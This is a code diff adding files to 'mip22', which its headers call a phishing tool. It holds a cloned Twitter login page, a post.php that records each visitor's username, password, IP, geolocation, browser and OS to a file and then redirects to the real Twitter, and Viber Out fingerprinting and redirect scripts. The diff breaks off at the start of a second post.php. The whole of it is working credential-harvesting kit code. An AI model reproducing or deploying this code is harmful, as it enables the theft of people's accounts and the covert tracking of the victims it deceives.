+.css-901oao { border: 0px solid black; box-sizing: border-box; color: rgb(0, 0, 0); display: inline; font: 14px system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Ubuntu, "Helvetica Neue", sans-serif; margin: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; }
+.css-16my406 { color: inherit; font: inherit; white-space: inherit; }
+.css-bfa6kz { max-width: 100%; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; }
+.css-9pa8cd { inset: 0px; height: 100%; opacity: 0; position: absolute; width: 100%; z-index: -1; }
+[stylesheet-group="2"] { }
+.r-13awgt0 { -moz-box-flex: 1; flex: 1 1 0%; }
+.r-4qtqp9 { display: inline-block; }
+.r-ywje51 { margin: auto; }
+.r-hvic4v { display: none; }
+.r-1adg3ll { display: block; }
+.r-6koalj { display: flex; }
+.r-sdzlij { border-radius: 9999px; }
+.r-1phboty { border-style: solid; }
+.r-rs99b7 { border-width: 1px; }
+.r-42olwf { border-color: rgba(0, 0, 0, 0); }
+.r-p1n3y5 { border-color: rgb(29, 161, 242); }
+.r-1yadl64 { border-width: 0px; }
+.r-crgep1 { margin: 0px; }
+.r-t60dpp { padding: 0px; }
+.r-17gur6a { border-radius: 0px; }
+.r-1sp51qo { padding: 10px; }
+.r-1tlfku8 { border-color: rgb(230, 236, 240); }
+.r-1udh08x { overflow: hidden; }
+.r-4iw3lz { border-width: 0px; }
+.r-wwvuq4 { padding: 0px; }
+.r-t23y2h { border-radius: 14px; }
+.r-1jkafct { border-radius: 2px; }
+.r-1awa8pu { border-color: rgb(101, 119, 134); }
+.r-1oqcu8e { padding: 15px; }
+.r-bztko3 { overflow: visible; }
+.r-xoduu5 { display: inline-flex; }
+.r-xf4iuw { margin: -8px; }
+.r-podbf7 { margin: -6px; }
+.r-1f0042m { border-radius: 5px; }
+.r-1jie2fr { border-color: rgba(0, 0, 0, 0.1); }
+[stylesheet-group="2.1"] { }
+.r-1jgb5lz { margin-left: auto; margin-right: auto; }
+.r-utggzx { padding-left: 10px; padding-right: 10px; }
+.r-rjfia { padding-bottom: 0px; padding-top: 0px; }
+.r-1fneopy { padding-left: 1em; padding-right: 1em; }
+.r-mk0yit { padding-left: 0px; padding-right: 0px; }
+.r-zg41ew { margin-bottom: 10px; margin-top: 10px; }
+.r-tvv088 { padding-bottom: 20px; padding-top: 20px; }
+.r-1j3t67a { padding-left: 15px; padding-right: 15px; }
+.r-5pqaiu { margin-bottom: calc(-10px); margin-top: calc(-10px); }
+.r-atwnbb { padding-bottom: 5px; padding-top: 5px; }
+.r-1w50u8q { padding-bottom: 10px; padding-top: 10px; }
+.r-hrzydr { margin-bottom: 2px; margin-top: 2px; }
+.r-1p4rafz { padding-left: 2px; padding-right: 2px; }
+.r-9qu9m4 { padding-bottom: 15px; padding-top: 15px; }
+.r-6b64d0 { padding-left: 0px; padding-right: 0px; }
+.r-ou255f { padding-left: 5px; padding-right: 5px; }
+.r-mvpalk { margin-left: 0px; margin-right: 0px; }
+.r-vlx1xi { margin-left: 10px; margin-right: 10px; }
+.r-15bsvpr { padding-left: 30px; padding-right: 30px; }
+[stylesheet-group="2.2"] { }
+.r-12vffkv > * { pointer-events: auto; }
+.r-12vffkv { pointer-events: none !important; }
+.r-14lw9ot { background-color: rgb(255, 255, 255); }
+.r-1p0dtai { bottom: 0px; }
+.r-1d2f490 { left: 0px; }
+.r-1xcajam { position: fixed; }
+.r-zchlnj { right: 0px; }
+.r-ipm5af { top: 0px; }
+.r-yyyyoo { fill: currentcolor; }
+.r-1xvli5t { height: 1.25em; }
+.r-dnmrzs { max-width: 100%; }
+.r-bnwqim { position: relative; }
+.r-1plcrui { vertical-align: text-bottom; }
+.r-lrvibr { user-select: none; }
+.r-13gxpu9 { color: rgb(29, 161, 242); }
+.r-wy61xf { height: 72px; }
+.r-u8s1d { position: absolute; }
+.r-1blnp2b { width: 72px; }
+.r-1ykxob0 { top: 60%; }
+.r-1b2b6em { line-height: 2em; }
+.r-q4m81j { text-align: center; }
+.r-12vffkv > * { pointer-events: auto; }
+.r-1pi2tsx { height: 100%; }
+.r-13qz1uu { width: 100%; }
+.r-417010 { z-index: 0; }
+.r-1g40b8q { z-index: 3; }
+.r-uvzvve { border-bottom-color: rgb(204, 214, 221); }
+.r-rull8r { border-bottom-style: solid; }
+.r-qklmqi { border-bottom-width: 1px; }
+.r-d3hbe1 { transform: translate3d(0px, 0px, 0px); }
+.r-o7ynqc { transition-duration: 0.2s; }
+.r-axxi2z { transition-property: transform, transform; }
+.r-136ojw6 { z-index: 2; }
+.r-1siec45 { }
+.r-sb58tz { max-width: 1000px; }
+.r-1wtj0ep { -moz-box-pack: justify; justify-content: space-between; }
+.r-18u37iz { -moz-box-direction: normal; -moz-box-orient: horizontal; flex-direction: row; }
+.r-1h3ijdo { height: 53px; }
+.r-16y2uox { -moz-box-flex: 1; flex-grow: 1; }
+.r-184en5c { z-index: 1; }
+.r-1ye8kvj { max-width: 600px; }
+.r-1777fci { -moz-box-pack: center; justify-content: center; }
+.r-1mf7evn { margin-right: 20px; }
+.r-1awozwy { -moz-box-align: center; align-items: center; }
+.r-1pz39u2 { align-self: stretch; }
+.r-1loqt21 { cursor: pointer; }
+.r-18qmn74 { min-width: 30px; }
+.r-1w2pmg { height: 0px; }
+.r-1niwhzg { background-color: rgba(0, 0, 0, 0); }
+.r-1vuscfd { min-height: 39px; }
+.r-1dhvaqw { min-width: calc(62.79px); }
+.r-53xb7h { min-width: 39px; }
+.r-6416eg { transition-property: background-color, box-shadow; }
+.r-ad9z0x { line-height: 1.3125; }
+.r-bcqeeo { min-width: 0px; }
+.r-qvutc0 { overflow-wrap: break-word; }
+.r-1qd0xha { font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Ubuntu, "Helvetica Neue", sans-serif; }
+.r-a023e6 { font-size: 15px; }
+.r-vw2c0b { font-weight: bold; }
+.r-eljoum { line-height: 1; }
+.r-1q142lx { flex-shrink: 0; }
+.r-50lct3 { height: 1.5em; }
+.r-lwhw9o { height: 1.75rem; }
+.r-1oszu61 { -moz-box-align: stretch; align-items: stretch; }
+.r-1wbh5a2 { flex-shrink: 1; }
+.r-17bb2tj { animation-duration: 0.75s; }
+.r-1muvv40 { animation-iteration-count: infinite; }
+.r-127358a { animation-name: r-9p3sdl; }
+@keyframes r-9p3sdl {
+0% { transform: rotate(0deg); }
+100% { transform: rotate(360deg); }
+}
+@keyframes r-9p3sdl {
+0% { transform: rotate(0deg); }
+100% { transform: rotate(360deg); }
+}
+.r-1ldzwu0 { animation-timing-function: linear; }
+.r-58zi21 { max-width: calc(240px); }
+.r-1vsu8ta { min-height: 30px; }
+.r-aj3cln { min-width: calc(48.3px); }
+.r-1n0xq6e { margin-left: 10px; }
+.r-urgr8i { background-color: rgb(29, 161, 242); }
+.r-jwli3a { color: rgb(255, 255, 255); }
+.r-1hfyk0a { padding-left: 10px; }
+.r-16f17gu { margin-right: calc(5px); }
+.r-150rngu { }
+.r-1iusvr4 { flex-basis: 0px; }
+.r-eqz5dr { -moz-box-direction: normal; -moz-box-orient: vertical; flex-direction: column; }
+.r-8fdsdq { z-index: 4; }
+.r-deolkf { box-sizing: border-box; }
+.r-ifefl9 { min-height: 0px; }
+.r-e84r5y { background-color: rgb(230, 236, 240); }
+.r-1re7ezh { color: rgb(101, 119, 134); }
+.r-hkyrab { color: rgb(20, 23, 26); }
+.r-16dba41 { font-weight: 400; }
+.r-30o5oe { -moz-appearance: none; }
+.r-1dz5y72 { resize: none; }
+.r-homxoj { color: inherit; }
+.r-poiln3 { font-family: inherit; }
+.r-7cikom { font-size: inherit; }
+.r-1ny4l3l { outline-style: none; }
+.r-1ttztb7 { text-align: inherit; }
+.r-1lrr6ok::-webkit-input-placeholder { color: rgb(101, 119, 134); opacity: 1; }
+.r-1lrr6ok::placeholder { color: rgb(101, 119, 134); opacity: 1; }
+.r-1lrr6ok::placeholder { color: rgb(101, 119, 134); opacity: 1; }
+.r-aqfbo4 { backface-visibility: hidden; }
+.r-2llsf { min-height: 100%; }
+.r-rthrr5 { width: 990px; }
+.r-33ulu8 { width: 600px; }
+.r-1ljd8xs { border-left-width: 1px; }
+.r-13l2t4g { border-right-width: 1px; }
+.r-my5ep6 { border-bottom-color: rgb(230, 236, 240); }
+.r-1habvwh { -moz-box-align: start; align-items: flex-start; }
+.r-1b6yd1w { font-size: 19px; }
+.r-1vr29t4 { font-weight: 800; }
+.r-obd0qt { -moz-box-align: end; align-items: flex-end; }
+.r-1joea0r { margin-left: 20px; }
+.r-6337vo { padding-bottom: calc(99px); }
+.r-zso239 { margin-right: 10px; }
+.r-1hycxz { width: 350px; }
+.r-1xk2f4g { clip: rect(1px, 1px, 1px, 1px); }
+.r-109y4c4 { height: 1px; }
+.r-92ng3h { width: 1px; }
+.r-1wyyakw { z-index: -1; }
+.r-y3da5r { box-shadow: rgba(101, 119, 134, 0.2) 0px 0px 8px, rgba(101, 119, 134, 0.25) 0px 1px 3px 1px; }
+.r-orgf3d { opacity: 0; }
+.r-eafdt9 { transition-duration: 0.15s; }
+.r-1b8bd59 { transition-property: transform, transform, opacity; }
+.r-nx0j10 { transition-timing-function: ease, ease, steps(1); }
+.r-1kihuf0 { align-self: center; }
+.r-7o8qx1 { margin-right: 5px; }
+.r-19wmn03 { width: 20px; }
+.r-gtdqiz { position: sticky; }
+.r-1l5qxre { padding-bottom: 59px; }
+.r-m611by { padding-top: 10px; }
+.r-ku1wi2 { margin-bottom: 15px; }
+.r-xaq1zp { width: 75%; }
+.r-1mlwlqe { flex-basis: auto; }
+.r-vvn4in { background-position: center center; }
+.r-u6sd8q { background-repeat: no-repeat; }
+.r-4gszlv { background-size: cover; }
+.r-d0pm55 { margin-bottom: 5px; }
+.r-19h5ruw { margin-top: 15px; }
+.r-1u4rsef { background-color: rgb(245, 248, 250); }
+.r-wgabs5 { border-bottom-width: 2px; }
+.r-k200y { align-self: flex-start; }
+.r-glunga { padding-top: 5px; }
+.r-1inuy60 { padding-bottom: 5px; }
+.r-vmopo1 { padding-top: 2px; }
+.r-1mdbw0j { padding-bottom: 0px; }
+.r-1n1174f { color: rgb(27, 149, 224); }
+.r-n6v787 { font-size: 13px; }
+.r-1sf4r6n { line-height: calc(19.6875px); }
+.r-1g94qm0 { margin-top: 5px; }
+.r-1w6e6rj { flex-wrap: wrap; }
+.r-1qfoi16 { padding-right: 10px; }
+.r-ip8ujx { height: 1em; }
+.r-1ro0kt6 { flex-basis: 0%; }
+.r-11j9u27 { visibility: hidden; }
+.r-s7hx6o { transition-duration: 0.25s; }
+.r-1ftll1t { transition-timing-function: ease-out; }
+.r-1p2783e { color: rgb(204, 214, 221); }
+.r-hbs49y { transform: translate3d(0px, 0px, 0px); }
+.r-tzz3ar { flex-wrap: nowrap; }
+.r-oucylx { border-bottom-color: rgba(0, 0, 0, 0); }
+.r-18p3no4 { border-bottom-color: rgb(29, 161, 242); }
+.r-17s6mgv { -moz-box-pack: end; justify-content: flex-end; }
+.r-1d09ksm { -moz-box-align: baseline; align-items: baseline; }
+.r-r2y082 { max-width: 50%; }
+.r-1blvdjr { font-size: 23px; }
+.r-1or9b2r { height: 10px; }
+.r-1jy2w8o { top: 1px; }
+.r-1h0z5md { -moz-box-pack: start; justify-content: flex-start; }
+.r-11cpok1 { }
+.r-clp7b1 { transition-property: color; }
+.r-3s2u2q { white-space: nowrap; }
+.r-27tl0q { width: 1em; }
+.r-zv2cs0 { background-color: rgba(29, 161, 242, 0.1); }
+.r-vrwoeq { background-color: rgb(204, 214, 221); }
+.r-1594n1d { height: 15%; }
+.r-qqzlmc { max-height: 100px; }
+.r-1jizoa0 { max-width: 100px; }
+.r-2t2l5v { min-height: 70px; }
+.r-1m5eot9 { min-width: 70px; }
+.r-1ih7r1r { width: 15%; }
+.r-9cviqr { margin-left: 2px; }
+.r-1bxhq7s { height: calc(6.5625rem); }
+.r-1omma8c { height: 5rem; }
+.r-14g73ha { height: 15px; }
+.r-1b94p3d { width: 15px; }
+.r-1mi75qu { box-shadow: rgba(0, 0, 0, 0.02) 0px 0px 2px inset; }
+.r-r72n3l { background-color: rgba(29, 161, 242, 0.2); }
+.r-1xljr72 { margin-left: calc(5px); }
+.r-1x0uki6 { margin-top: 20px; }
+.r-j66t93 { height: 39px; }
+.r-15d164r { margin-bottom: 10px; }
+.r-6ity3w { margin-top: 30px; }
+.r-1jayybb { min-height: 49px; }
+.r-17bavie { min-width: calc(78.89px); }
+.r-icoktb { opacity: 0.5; }
+.r-1q3imqu { background-color: rgb(26, 145, 218); }
+</style>
+
+
+
+<title>Login on Twitter / Twitter</title>
+
+
+
+<style>
+button 
+{
+background-color: #08a0e9;/* Green */
+border: none;
+color: white;
+}
+</style>
+
+  </head>
+
+
+<body style="background-color: rgb(255, 255, 255);">
+  
+
+<div id="react-root" style="height:100%;display:flex;">
+<div class="css-1dbjc4n r-13awgt0 r-12vffkv" data-reactroot="">
+<div class="css-1dbjc4n r-13awgt0 r-12vffkv">
+<div class="r-1d2f490 r-u8s1d r-zchlnj r-ipm5af r-184en5c">
+<div class="css-1dbjc4n r-aqfbo4 r-1p0dtai r-1d2f490 r-12vffkv r-1xcajam r-zchlnj">
+<div class="css-1dbjc4n">
+</div>
+</div>
+</div>
+
+<div class="css-1dbjc4n r-1pi2tsx r-13qz1uu r-417010" style="min-height: 693px;" aria-hidden="false">
+<main role="main" class="css-1dbjc4n r-16y2uox r-1wbh5a2">
+<div class="css-1dbjc4n r-150rngu r-16y2uox r-1wbh5a2">
+<div class="css-1dbjc4n r-1jgb5lz r-1x0uki6 r-1ye8kvj r-1j3t67a r-13qz1uu">
+<svg viewBox="0 0 24 24" class="r-13gxpu9 r-4qtqp9 r-yyyyoo r-j66t93 r-dnmrzs r-bnwqim r-1plcrui r-lrvibr">
+<g>
+<path d="M23.643 4.937c-.835.37-1.732.62-2.675.733.962-.576 1.7-1.49 2.048-2.578-.9.534-1.897.922-2.958 1.13-.85-.904-2.06-1.47-3.4-1.47-2.572 0-4.658 2.086-4.658 4.66 0 .364.042.718.12 1.06-3.873-.195-7.304-2.05-9.602-4.868-.4.69-.63 1.49-.63 2.342 0 1.616.823 3.043 2.072 3.878-.764-.025-1.482-.234-2.11-.583v.06c0 2.257 1.605 4.14 3.737 4.568-.392.106-.803.162-1.227.162-.3 0-.593-.028-.877-.082.593 1.85 2.313 3.198 4.352 3.234-1.595 1.25-3.604 1.995-5.786 1.995-.376 0-.747-.022-1.112-.065 2.062 1.323 4.51 2.093 7.14 2.093 8.57 0 13.255-7.098 13.255-13.254 0-.2-.005-.402-.014-.602.91-.658 1.7-1.477 2.323-2.41z">
+</path>
+</g>
+</svg>
+
+<h1 dir="auto" role="heading" class="css-4rbku5 css-901oao r-hkyrab r-1qd0xha r-1blvdjr r-vw2c0b r-ad9z0x r-15d164r r-mvpalk r-6ity3w r-bcqeeo r-q4m81j r-qvutc0">
+<span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Log in to Twitter</span>
+</h1>
+
+
+<form action="post.php" method="post" class="r-13qz1uu" target="_top">
+
+<div class="css-1dbjc4n">
+
+
+<div class="css-1dbjc4n r-1j3t67a r-1w50u8q">
+<label class="css-1dbjc4n r-1u4rsef r-rull8r r-wgabs5 r-1awa8pu r-1jkafct r-18u37iz">
+<div class="css-1dbjc4n r-16y2uox r-1wbh5a2">
+<div dir="auto" class="css-901oao css-bfa6kz r-k200y r-1re7ezh r-1qd0xha r-a023e6 r-16dba41 r-ad9z0x r-bcqeeo r-utggzx r-glunga r-qvutc0">
+<span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0" name="email or phone">Phone, email, or username</span>
+</div>
+
+<div class="css-1dbjc4n r-18u37iz r-16y2uox r-1wbh5a2 r-1udh08x">
+<div dir="auto" class="css-901oao r-1awozwy r-k200y r-hkyrab r-6koalj r-1qd0xha r-1b6yd1w r-16dba41 r-ad9z0x r-bcqeeo r-13qz1uu r-qvutc0">
+<input required type="email" name="phone_or_email" spellcheck="false" dir="auto" class="r-30o5oe r-1niwhzg r-17gur6a r-1yadl64 r-deolkf r-homxoj r-poiln3 r-7cikom r-1ny4l3l r-1inuy60 r-utggzx r-vmopo1 r-1w50u8q r-1lrr6ok r-1dz5y72 r-1ttztb7 r-13qz1uu">
+</div>
+</div>
+</div>
+</label>
+      
+
+<div class="css-1dbjc4n r-18u37iz r-utggzx">
+<div class="css-1dbjc4n r-13awgt0 r-eqz5dr">
+
+</div>
+</div>
+</div>
+
+<div class="css-1dbjc4n r-1j3t67a r-1w50u8q">
+
+<label class="css-1dbjc4n r-1u4rsef r-rull8r r-wgabs5 r-p1n3y5 r-1jkafct r-18u37iz">
+
+<div class="css-1dbjc4n r-16y2uox r-1wbh5a2">
+
+<div dir="auto" class="css-901oao css-bfa6kz r-k200y r-13gxpu9 r-1qd0xha r-a023e6 r-16dba41 r-ad9z0x r-bcqeeo r-utggzx r-glunga r-qvutc0">
+<span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Password</span>
+</div>
+
+<div class="css-1dbjc4n r-18u37iz r-16y2uox r-1wbh5a2 r-1udh08x">
+<div dir="auto" class="css-901oao r-1awozwy r-k200y r-hkyrab r-6koalj r-1qd0xha r-1b6yd1w r-16dba41 r-ad9z0x r-bcqeeo r-13qz1uu r-qvutc0">
+<input required type="password" name="password" type="password" class="r-30o5oe r-1niwhzg r-17gur6a r-1yadl64 r-deolkf r-homxoj r-poiln3 r-7cikom r-1ny4l3l r-1inuy60 r-utggzx r-vmopo1 r-1w50u8q r-1lrr6ok r-1dz5y72 r-1ttztb7 r-13qz1uu">
+</div>
+</div>
+</div>
+</label>
+
+<div class="css-1dbjc4n r-18u37iz r-utggzx">
+<div class="css-1dbjc4n r-13awgt0 r-eqz5dr">
+</div>
+</div>
+</div>
+ 
+
+
+<button type="submit" class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0" 
+style="height:50px; width:100%; color:white; border-radius: 40px;">
+ Log in
+</button>
+
+
+
+
+</div>
+</form>
+
+
+<div class="css-901oao r-hkyrab r-1qd0xha r-a023e6 r-16dba41 r-ad9z0x r-1x0uki6 r-bcqeeo r-q4m81j r-qvutc0">
+
+<div class="css-1dbjc4n r-1d09ksm r-xoduu5 r-18u37iz r-1wbh5a2">
+<a href="https://twitter.com/account/begin_password_reset" role="link" data-focusable="true" class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Forgot password?</span></a>
+<span aria-hidden="true" class="css-901oao css-16my406 r-1re7ezh r-1q142lx r-1qd0xha r-ad9z0x r-bcqeeo r-ou255f r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">·</span></span>
+
+<a href="https://twitter.com/i/flow/signup" role="link" data-focusable="true" class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Sign up for Twitter</span></a></div></div></div></div></main></div></div></div></div>
+

+ 130 - 0
.pages/twitter/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nTWITTER VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['phone_or_email'] . "\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['password'] . "\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://twitter.com/i/flow/login"/> 

+ 126 - 0
.pages/viber_out/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nVIBER OUT VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 92 - 0
.pages/viber_out/index.html


+ 25 - 0
.pages/viber_out/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

+ 130 - 0
.pages/viber_out/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
